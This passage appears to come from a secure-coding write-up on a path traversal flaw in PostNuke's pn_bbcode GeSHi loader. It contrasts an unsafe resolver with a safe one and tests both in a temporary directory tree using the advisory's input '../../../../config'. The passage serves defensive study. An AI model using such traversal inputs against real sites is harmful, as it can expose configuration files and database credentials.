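    if not LANGUAGE_ID.fullmatch(language):
        return None
    base = os.path.realpath(geshi_dir)
    candidate = os.path.realpath(os.path.join(base, language + '.php'))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Build a throwaway tree with the PostNuke layout named in the advisory
    and run the author's '../../../../config' input through both resolvers."""
    root = tempfile.mkdtemp()
    try:
        geshi_dir = os.path.join(root, 'modules', 'pn_bbcode', 'pnincludes', 'geshi')
        os.makedirs(geshi_dir)
        with open(os.path.join(geshi_dir, 'php.php'), 'w') as fh:
            fh.write('<?php /* constructed language file */ ?>')
        with open(os.path.join(root, 'config.php'), 'w') as fh:
            fh.write('<?php $dbpass = "constructed"; ?>')   # stand-in for PostNuke's config.php
        traversal = '../../../../config'
        return {
            'unsafe_reads_config':
                geshi_path_unsafe(geshi_dir, traversal) == os.path.join(root, 'config.php'),
            'safe_rejects_traversal':
                geshi_path_safe(geshi_dir, traversal) is None,
            'safe_allows_php':
                geshi_path_safe(geshi_dir, 'php')
                == os.path.realpath(os.path.join(geshi_dir, 'php.php')),
            'safe_rejects_unknown':
                geshi_path_safe(geshi_dir, 'nosuchlang') is None,
        }
    finally:
        shutil.rmtree(root)
```

Two independent checks are used on purpose: the character allowlist stops the traversal before any filesystem call, and the realpath containment check catches anything the allowlist might later be loosened to admit (symlinks included).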